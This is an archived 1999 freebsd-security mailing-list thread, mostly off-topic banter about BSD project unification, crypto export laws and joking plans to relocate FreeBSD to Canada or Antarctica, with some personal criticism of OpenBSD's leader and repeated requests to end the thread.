In-Reply-To: <4.2.0.58.19990818090832.04805220@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 18 Aug 1999, Brett Glass wrote:

> At 01:21 AM 8/18/99 -0700, Jordan K. Hubbard wrote:
> I'll say this much, though: the OpenBSD approach to crypto export restrictions
> (i.e. keeping the code in Canada) is brilliant and could help FreeBSD.

If 'we' wish to 'move' the location of the OFFICIAL FreeBSD (or ANY
OpenSource) project, perhaps a search of the various laws of the world
would come up with an ideal home.

Perhaps some country is willing to create an 'OpenSource law friendly'
space within its borders.

I wonder what laws apply in Antarctica? (I'm betting that moving the *BSD
projects to Antarctica would get press also. To keep the natives
happy...we bring fish for the penguins.
:-)

From owner-freebsd-security Wed Aug 18 09:16:22 1999
Received: from mail-gw5.pacbell.net (mail-gw5.pacbell.net [206.13.28.23]) by hub.freebsd.org (Postfix) with ESMTP id 520E3158BA for ; Wed, 18 Aug 1999 09:16:18 -0700 (PDT) (envelope-from dean@thegrid.net)
Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net [63.193.246.169]) by mail-gw5.pacbell.net (8.9.3/8.9.3) with SMTP id JAA01555 for ; Wed, 18 Aug 1999 09:16:16 -0700 (PDT)
Message-Id: <4.1.19990818090916.00971540@mail.thegrid.net>
X-Sender: i289861@mail.thegrid.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 18 Aug 1999 09:11:05 -0700
To: freebsd-security@freebsd.org
From: Dean
Subject: Re: "Secure-FreeBSD" Idea
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

At 07:42 AM 8/13/99 -0500, you wrote:
>
>
>On Fri, 13 Aug 1999, Michael Richards wrote:
>>
>> I was toying with this idea too. People often say when comparing FreeBSD
>> and linux that "FreeBSD is harder to install." Although I don't agree with
>> that statement, I had to take note on how easy my install of BeOS went.
>> Basically I popped the CD in, selected the partition and hit install. It
>> whirled rebooted and presto, I was running Be.
>
>I recently installed Redhat and FreeBSD...I am familiar with both, but the
>Redhat install took 3 runs through the install process to get right, and
>FreeBSD took only one...Granted, they were minor problems in redhat that
>most people wouldn't come across, but it is still one valid experience of
>mine...(The FreeBSD install was more flexible than the redhat one).
>
>--dave

And don't even mention the mkLinuX installer (which is the redhat
installer).

But aren't we getting a little off topic here?
Dean
-------------------------------------------------------------------------------
A train stops at a train station, a bus stops at a bus station.
On my desk, I have a workstation....
-------------------------------------------------------------------------------

From owner-freebsd-security Wed Aug 18 09:40:25 1999
Received: from topsecret.net (gill.apk.net [207.54.148.62]) by hub.freebsd.org (Postfix) with SMTP id 1FC9C14FBA for ; Wed, 18 Aug 1999 09:40:15 -0700 (PDT) (envelope-from gill@topsecret.net)
Received: from stumpy by topsecret.net with SMTP (MDaemon.v2.7.SP5.R) for ; Wed, 18 Aug 1999 12:39:02 -0400
From: "James Gill"
To: , "'Freebsd-Security@Freebsd. Org'"
Cc: "Harry M. Leitzell"
Subject: OpenBSD (FW: Please do not take this above statement too lightly, since the project is typically not in strong financial health.)
Date: Wed, 18 Aug 1999 12:38:23 -0400
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG
X-Return-Path: gill@topsecret.net

Well, Harry, I guess you were right.

Never mind, go back to your chores. (cores?)

--gill

-----Original Message-----
From: Theo de Raadt [mailto:deraadt@cvs.openbsd.org]
Sent: Wednesday, August 18, 1999 12:05 PM
Subject: Re: Please do not take this above statement too lightly, since the project is typically not in strong financial health.

Not in your life.

Sorry. You better read up on history.

http://theos.com/deraadt/coremail

And search archives.

>
> Hi Theo.
>
> You don't know me, I'm just a (relatively new) *BSD user making his
> way in the world out of the clutches of a microsoft-dominated
> landscape.
>
> While exploring the *BSD community I learned of the different projects
> (Free, Open, Net) and wondered aloud why these projects were not more
> closely aligned. When I read on your website that the project was in
> grave danger due to lack of funding I became concerned because in my
> security work I've heard OpenBSD highly regarded and I anticipate that
> the future can only bring further improvements.
>
> My concern led me to make some posts in the freebsd-security mailing
> list where I made the following comment and received the response from
> one Jordan K. Hubbard:
> ------------------------------------------------
> > I dunno, perhaps this is an opportune time to try to coordinate the
> > projects?
>
> It's never been a question of money, coordination, or really anything
> at all to do with engineering. It has everything to do with one or
> more individuals volunteering the time necessary for making something
> like this happen.
>
> That also goes for just about every other obvious idea or clear
> shortcoming that one might note for FreeBSD - if it's obvious or
> clear, chances are excellent that it's been both suggested many times
> and failed many times due to lack of this one key missing ingredient.
> :)
>
> - Jordan
> ------------------------------------------------
>
> And before I go and open my big mouth and say how excited I would be
> to do My Part, I wanted to know what your views were on the situation?
> How willing is OpenBSD to try to coordinate its strengths with the
> FreeBSD project and vice versa to implement the best of both?
>
> regards,
> --gill
>
>

From owner-freebsd-security Wed Aug 18 12:27:34 1999
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 923531527D for ; Wed, 18 Aug 1999 12:27:23 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA25388; Wed, 18 Aug 1999 12:23:40 -0700 (PDT)
Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA13953; Wed, 18 Aug 1999 12:17:28 -0700
Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id NAA05251; Wed, 18 Aug 1999 13:23:21 -0600
Message-ID: <37BB0829.CFF28FCE@softweyr.com>
Date: Wed, 18 Aug 1999 13:23:21 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: marc rassbach
Cc: Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

marc rassbach wrote:
>
> If 'we' wish to 'move' the location of the OFFICIAL FreeBSD (or ANY
> OpenSource) project, perhaps a search of the various laws of the world
> would come up with an ideal home.
>
> Perhaps some country is willing to create an 'OpenSource law friendly'
> space within its borders.
>
> I wonder what laws apply in Antarctica? (I'm betting that moving the *BSD
> projects to Antarctica would get press also. To keep the natives
> happy...we bring fish for the penguins. :-)

Not a bad idea, we'd only need one person to staff the office in order to
make it official. The network link in is going to cost a bit though.
Jordan, are you packing yet? I'll pony up $100 towards the cost of skis
for your airplane.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                   Softweyr LLC
http://softweyr.com/                                     wes@softweyr.com

From owner-freebsd-security Wed Aug 18 12:27:55 1999
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id EB5CA1527D for ; Wed, 18 Aug 1999 12:27:45 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA25420; Wed, 18 Aug 1999 12:24:34 -0700 (PDT)
Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA13995; Wed, 18 Aug 1999 12:18:22 -0700
Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id NAA05262; Wed, 18 Aug 1999 13:24:29 -0600
Message-ID: <37BB086C.6CC4261E@softweyr.com>
Date: Wed, 18 Aug 1999 13:24:28 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Brett Glass
Cc: Poul-Henning Kamp , Thomas Uhrfelt , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
References: <4.2.0.58.19990818090642.04808ec0@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Brett Glass wrote:
>
> Hey, now THERE would be an event that would get the BSDs some positive
> press: a Great Unification.

At least this one managed to stay dead for more than a year this time.
Please don't encourage this by following up to it.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                   Softweyr LLC
http://softweyr.com/                                     wes@softweyr.com

From owner-freebsd-security Wed Aug 18 12:47:18 1999
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 79418151BF; Wed, 18 Aug 1999 12:47:08 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA25784; Wed, 18 Aug 1999 12:46:31 -0700 (PDT)
Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA14768; Wed, 18 Aug 1999 12:40:04 -0700
Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id NAA05477; Wed, 18 Aug 1999 13:46:12 -0600
Message-ID: <37BB0D83.27927148@softweyr.com>
Date: Wed, 18 Aug 1999 13:46:11 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: James Gill
Cc: freebsd-chat@FreeBSD.ORG, "'Freebsd-Security@Freebsd. Org'" , "Harry M. Leitzell"
Subject: Re: OpenBSD (FW: Please do not take this above statement too lightly, since the project is typically not in strong financial health.)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

James Gill wrote:
> Theo de Raadt [mailto:deraadt@cvs.openbsd.org] wrote:
> >
> > Sorry. You better read up on history.
> >
> > http://theos.com/deraadt/coremail
> >
> > And search archives.
>
> Well, Harry, I guess you were right.
>
> Never mind, go back to your chores. (cores?)

This is a pretty one-sided archive, omitting most of what Theo said. Look
it up in the archives yourself, and look up some of the incidents that led
up to it. It was certainly not the childish reaction Theo paints it as.
Theo is very abrupt and thinks everyone in the world other than himself
should have skin 3 feet thick, while he is VERY quick to take insult at any
reference he doesn't consider complimentary. OpenBSD has been hanging by a
financial thread since the day Theo created it because it is Theo's baby,
Theo doesn't make (much) money from it or anything else, and because Theo
fails to attract any considerable development team because he is rude and
arrogant. I'm continually amazed at the abrupt, curt, and rude answers I
get to every correspondence with Theo or OpenBSD.org, even when I am
offering some small item of help.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                   Softweyr LLC
http://softweyr.com/                                     wes@softweyr.com

From owner-freebsd-security Wed Aug 18 13:02:17 1999
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 81220152DD for ; Wed, 18 Aug 1999 13:02:08 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee)
Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id XAA20954; Wed, 18 Aug 1999 23:01:36 +0300 (EEST)
Date: Wed, 18 Aug 1999 23:01:36 +0300 (EEST)
From: Narvi
To: Wes Peters
Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-Reply-To: <37BB0829.CFF28FCE@softweyr.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 18 Aug 1999, Wes Peters wrote:

> marc rassbach wrote:
> >
> > If 'we' wish to 'move' the location of the OFFICIAL FreeBSD (or ANY
> > OpenSource) project, perhaps a search of the various laws of the world
> > would come up with an ideal home.
> >
> > Perhaps some country is willing to create an 'OpenSource law friendly'
> > space within its borders.
> >
> > I wonder what laws apply in Antarctica? (I'm betting that moving the *BSD
> > projects to Antarctica would get press also. To keep the natives
> > happy...we bring fish for the penguins. :-)
>
> Not a bad idea, we'd only need one person to staff the office in order to
> make it official. The network link in is going to cost a bit though.
> Jordan, are you packing yet? I'll pony up $100 towards the cost of skis
> for your airplane.
>

So what we really need is canfug (provided it exists) to take over the
management of the main cvs server which relocates to Canada?

> --
> "Where am I, and what am I doing in this handbasket?"
>
> Wes Peters                                                   Softweyr LLC
> http://softweyr.com/                                     wes@softweyr.com
>

Sander

There is no love, no good, no happiness and no future -
all these are just illusions.

From owner-freebsd-security Wed Aug 18 13:09:16 1999
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 2C31415B32 for ; Wed, 18 Aug 1999 13:08:56 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA02311; Wed, 18 Aug 1999 22:06:18 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Wes Peters
Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-reply-to: Your message of "Wed, 18 Aug 1999 13:23:21 MDT." <37BB0829.CFF28FCE@softweyr.com>
Date: Wed, 18 Aug 1999 22:06:18 +0200
Message-ID: <2309.935006778@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <37BB0829.CFF28FCE@softweyr.com>, Wes Peters writes:
>> I wonder what laws apply in Antarctica? (I'm betting that moving the *BSD
>> projects to Antarctica would get press also. To keep the natives
>> happy...we bring fish for the penguins. :-)
>
>Not a bad idea, we'd only need one person to staff the office in order to
>make it official. The network link in is going to cost a bit though.
>Jordan, are you packing yet? I'll pony up $100 towards the cost of skis
>for your airplane.

Antarctica is a UN protectorate, you cannot set up a business there, and
I doubt they would allow us either.

I hate to think about the cost of the T1 line too.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Wed Aug 18 13:15:44 1999
Received: from tandem.milestonerdl.com (tandem.milestonerdl.com [204.107.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 77CB71522E for ; Wed, 18 Aug 1999 13:15:33 -0700 (PDT) (envelope-from marc@tandem.milestonerdl.com)
Received: from localhost (marc@localhost) by tandem.milestonerdl.com (8.9.3/8.9.3) with ESMTP id QAA11336; Wed, 18 Aug 1999 16:46:22 -0500 (CDT)
Date: Wed, 18 Aug 1999 16:46:22 -0500 (CDT)
From: marc rassbach
To: Narvi
Cc: Wes Peters , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 18 Aug 1999, Narvi wrote:

> So what we really need is canfug (provided it exists) to take over the
> management of the main cvs server which relocates to Canada?

Canada *MAY* not be the best place. Keep in mind OTHER legal issues exist.
Like the proposed law that would make reverse-engineering illegal (as
opposed to a licence violation) et al.

I'm *NOT* a legal beagle, nor do I play one on the InterNet (much anyway).
But if any kind of move is thought of, WHERE to move to should be
researched.

And who knows, perhaps some up-and-coming country would be willing to make
a place with laws that are pro-OpenSource, w/o stepping on the rights of the
closed-source world.

And if no such place on this planet can be found, in a few years, there's
always a space station.

From owner-freebsd-security Wed Aug 18 13:17:04 1999
Received: by hub.freebsd.org (Postfix, from userid 608) id DC37214FF0; Wed, 18 Aug 1999 13:17:02 -0700 (PDT)
From: "Jonathan M. Bresler"
To: mike@argos.org
Cc: brett@lariat.org, freebsd-security@FreeBSD.ORG
In-reply-to: (message from Mike Nowlin on Wed, 18 Aug 1999 01:58:02 -0400 (EDT))
Subject: Re: OpenBSD
Message-Id: <19990818201702.DC37214FF0@hub.freebsd.org>
Date: Wed, 18 Aug 1999 13:17:02 -0700 (PDT)

>
> I'd sure hope so... Let's face it -- even though FreeBSD is (in my
> opinion) the most "robust" out of the bunch, the x86 architecture isn't
> going to win any awards for performance.... Cheap, yes. Easy, yes.
> Works for the most part, yes. But it's still based off of the idea that
> we need to be backwards-compatible with the late 1700's. The Alpha port
> of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple
> of the Alpha machines I have available for playing with), but the high-end
> boxes are pretty pricey. You can find multi-processor SPARC machines
> being practically given away by companies who don't know what they're
> capable of, not to mention several other platforms.

this is incorrect. the intel processors knock the snot out of sparc in
integer performance. take a look at the hint benchmark for example.
the benchmark is in the ports tree.

the alpha on the other hand knocks the intel flat on the mat.

jmb

From owner-freebsd-security Wed Aug 18 13:18:51 1999
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id DA2DC156F3 for ; Wed, 18 Aug 1999 13:18:44 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA26341; Wed, 18 Aug 1999 13:15:59 -0700 (PDT)
Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA15969; Wed, 18 Aug 1999 13:09:32 -0700
Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id OAA05731; Wed, 18 Aug 1999 14:14:05 -0600
Message-ID: <37BB140D.2D5E9A02@softweyr.com>
Date: Wed, 18 Aug 1999 14:14:05 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Poul-Henning Kamp
Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
References: <2309.935006778@critter.freebsd.dk>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Poul-Henning Kamp wrote:
>
> In message <37BB0829.CFF28FCE@softweyr.com>, Wes Peters writes:
>
> >> I wonder what laws apply in Antarctica? (I'm betting that moving the *BSD
> >> projects to Antarctica would get press also. To keep the natives
> >> happy...we bring fish for the penguins. :-)
> >
> >Not a bad idea, we'd only need one person to staff the office in order to
> >make it official. The network link in is going to cost a bit though.
> >Jordan, are you packing yet? I'll pony up $100 towards the cost of skis
> >for your airplane.
>
> Antarctica is a UN protectorate, you cannot set up a business there, and
> I doubt they would allow us either.
>
> I hate to think about the cost of the T1 line too.

I can probably negotiate us a good discount with Alcatel submarine
networks. They don't do T1, but Jordan would need at least an OC-48
anyhow, wouldn't he?

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                   Softweyr LLC
http://softweyr.com/                                     wes@softweyr.com

From owner-freebsd-security Wed Aug 18 13:22:57 1999
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 8292215944 for ; Wed, 18 Aug 1999 13:22:38 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA02448; Wed, 18 Aug 1999 22:19:10 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Wes Peters
Cc: marc rassbach , Brett Glass , "Jordan K.
 Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-reply-to: Your message of "Wed, 18 Aug 1999 14:14:05 MDT." <37BB140D.2D5E9A02@softweyr.com>
Date: Wed, 18 Aug 1999 22:19:10 +0200
Message-ID: <2446.935007550@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <37BB140D.2D5E9A02@softweyr.com>, Wes Peters writes:
>Poul-Henning Kamp wrote:
>> Antarctica is a UN protectorate, you cannot set up a business there, and
>> I doubt they would allow us either.
>>
>> I hate to think about the cost of the T1 line too.
>
>I can probably negotiate us a good discount with Alcatel submarine networks.
>They don't do T1, but Jordan would need at least an OC-48 anyhow, wouldn't
>he?

As far as I know the 386BSD0.0 machine which runs the "jordan" AI program
is only connected with a 9600 slip line :-)

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Wed Aug 18 13:26:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id B242B158F5 for ; Wed, 18 Aug 1999 13:25:53 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA02509; Wed, 18 Aug 1999 22:23:01 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: marc rassbach
Cc: Narvi , Wes Peters , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-reply-to: Your message of "Wed, 18 Aug 1999 16:46:22 CDT."
Date: Wed, 18 Aug 1999 22:23:01 +0200
Message-ID: <2507.935007781@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Guys, can we just can this thread now?

We're way into speculation here and you are clogging quite a number
of mailboxes with it...

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Wed Aug 18 13:27:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.utexas.edu (wb3-a.mail.utexas.edu [128.83.126.138]) by hub.freebsd.org (Postfix) with SMTP id 3FFFD15B68 for ; Wed, 18 Aug 1999 13:27:09 -0700 (PDT) (envelope-from rkw@dataplex.net)
Received: (qmail 13636 invoked by uid 0); 18 Aug 1999 20:27:20 -0000
Received: from dial-53-39.ots.utexas.edu (HELO nomad.dataplex.net) (128.83.57.135) by umbs-smtp-3 with SMTP; 18 Aug 1999 20:27:20 -0000
From: Richard Wackerbarth
Organization: The Digital Dataplex
To: freebsd-security@FreeBSD.org
Subject: Re: OpenBSD
Date: Wed, 18 Aug 1999 15:14:52 -0500
X-Mailer: KMail [version 1.0.21]
Content-Type: text/plain
References: <2309.935006778@critter.freebsd.dk>
MIME-Version: 1.0
Message-Id: <99081815263304.16573@nomad.dataplex.net>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 18 Aug 1999, Poul-Henning Kamp wrote:
>In message <37BB0829.CFF28FCE@softweyr.com>, Wes Peters writes:
>
>>> I wonder what laws apply in Antarctica? (I'm betting that moving the *BSD
>>> projects to Antarctica would get press also. To keep the natives
>>> happy...we bring fish for the penguins. :-)
>>
>>Not a bad idea, we'd only need one person to staff the office in order to
>>make it official. The network link in is going to cost a bit though.
>>Jordan, are you packing yet? I'll pony up $100 towards the cost of skis
>>for your airplane.
>
>Antarctica is a UN protectorate, you cannot set up a business there, and
>I doubt they would allow us either.

But FreeBSD is already there. I know one of the "regulars" who goes there
every (down under) summer. And they just posted a job opening at The
University of Texas for a sysadmin. One of the requirements is that he pass
the physical for Antarctica. Perhaps I should apply. :-)

>I hate to think about the cost of the T1 line too.

Dream on..... They would jump for joy if they could get a dedicated 56k.

From owner-freebsd-security Wed Aug 18 14:30:08 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shiva.eu.org (cx943344-a.fed1.sdca.home.com [24.0.167.187]) by hub.freebsd.org (Postfix) with ESMTP id 11AF114CAA; Wed, 18 Aug 1999 14:30:01 -0700 (PDT) (envelope-from bigby@shiva.eu.org)
Received: from localhost (bigby@localhost) by shiva.eu.org (8.9.3/8.9.3) with ESMTP id NAA00789; Wed, 18 Aug 1999 13:30:23 -0700 (PDT) (envelope-from bigby@shiva.eu.org)
Date: Wed, 18 Aug 1999 13:30:18 -0700 (PDT)
From: Bigby Findrake
To: "Jonathan M. Bresler"
Cc: mike@argos.org, brett@lariat.org, freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-Reply-To: <19990818201702.DC37214FF0@hub.freebsd.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 18 Aug 1999, Jonathan M. Bresler wrote:

> >
> > I'd sure hope so... Let's face it -- even though FreeBSD is (in my
> > opinion) the most "robust" out of the bunch, the x86 architecture isn't
> > going to win any awards for performance.... Cheap, yes. Easy, yes.
> > Works for the most part, yes. But it's still based off of the idea that
> > we need to be backwards-compatible with the late 1700's. The Alpha port
> > of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple
> > of the Alpha machines I have available for playing with), but the high-end
> > boxes are pretty pricey. You can find multi-processor SPARC machines
> > being practically given away by companies who don't know what they're
> > capable of, not to mention several other platforms.
>
>
> this is incorrect. the intel processors knock the snot out of
> sparc in integer performance. take a look at the hint benchmark for
> example. the benchmark is in the ports tree.
>
> the alpha on the other hand knocks the intel flat on the mat.
>
> jmb

Somehow I fail to notice how any of this pertains to FreeBSD security.
Can someone please enlighten me or, barring that, perhaps move this
conversation to a more appropriate location.

/-------------------------------------------------------------------------/
"What reason weaves, by passion is undone." -- Alexander Pope
finger bigby@shiva.eu.org for my pgpkey
e-mail bigby@pager.shiva.eu.org to page me
/-------------------------------------------------------------------------/

From owner-freebsd-security Wed Aug 18 14:30:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 3E00F14ED3 for ; Wed, 18 Aug 1999 14:30:11 -0700 (PDT) (envelope-from nick@rapidnet.com)
Received: from localhost (nick@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id PAA54043; Wed, 18 Aug 1999 15:27:45 -0600 (MDT)
Date: Wed, 18 Aug 1999 15:27:45 -0600 (MDT)
From: Nick Rogness
To: Wes Peters
Cc: Poul-Henning Kamp , marc rassbach , Brett Glass , "Jordan K.
 Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-Reply-To: <37BB140D.2D5E9A02@softweyr.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 18 Aug 1999, Wes Peters wrote:

> Poul-Henning Kamp wrote:
>
> I can probably negotiate us a good discount with Alcatel submarine networks.
> They don't do T1, but Jordan would need at least an OC-48 anyhow, wouldn't
> he?

OC-48 is for pussies! OC-192C baby.

*******************************************************************
Nick Rogness                    Shaw's Principle:
System Administrator              Build a system that even a fool
RapidNet, INC                     can use, and only a fool will
nick@rapidnet.com                 want to use it.
*******************************************************************

From owner-freebsd-security Wed Aug 18 16:04:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from romeo.cnmnetwork.com (romeo.cnmnetwork.com [209.79.28.28]) by hub.freebsd.org (Postfix) with SMTP id 54C08159CD for ; Wed, 18 Aug 1999 16:04:10 -0700 (PDT) (envelope-from jrz@cnmnetwork.com)
Received: (qmail 17143 invoked from network); 18 Aug 1999 16:01:35 -0700
Received: from prometheus.cnmnetwork.com (HELO cnmnetwork.com) (irc@209.79.28.5) by romeo.cnmnetwork.com with SMTP; 18 Aug 1999 16:01:35 -0700
Message-ID: <37BB3ED4.99DCB40D@cnmnetwork.com>
Date: Wed, 18 Aug 1999 16:16:36 -0700
From: Jacob Zehnder
X-Mailer: Mozilla 4.08 [en] (WinNT; I)
MIME-Version: 1.0
To: marc rassbach
Cc: Narvi , Wes Peters , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

It would be a REALLY good idea to kill this thread ASAP :)

--jacob

marc rassbach wrote:
>
> On Wed, 18 Aug 1999, Narvi wrote:
> > So what we really need is canfug (provided it exists) to take over the
> > management of the main cvs server which relocates to Canada?
>
> Canada *MAY* not be the best place. Keep in mind OTHER legal issues
> exist. Like the proposed law that would make reverse-engineering illegal
> (as opposed to a licence violation) etc.
>
> I'm *NOT* a legal beagle, nor do I play one on the InterNet (much anyway).
> But if any kind of move is thought of, WHERE to move to should be
> researched. And who knows, perhaps some up-and-coming country would be
> willing to make a place with laws that are pro-OpenSource, w/o stepping
> on the rights of the closed-source world.
>
> And if no such place on this planet can be found, in a few years, there's
> always a space station.

--
--------------
Jacob Zehnder - CNM Network
jrz@cnmnetwork.com
+1 (805) 520-7170
http://www.cnmnetwork.com
--------------
"One World, One Web, One Program" - Microsoft Promotional Ad
"Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler

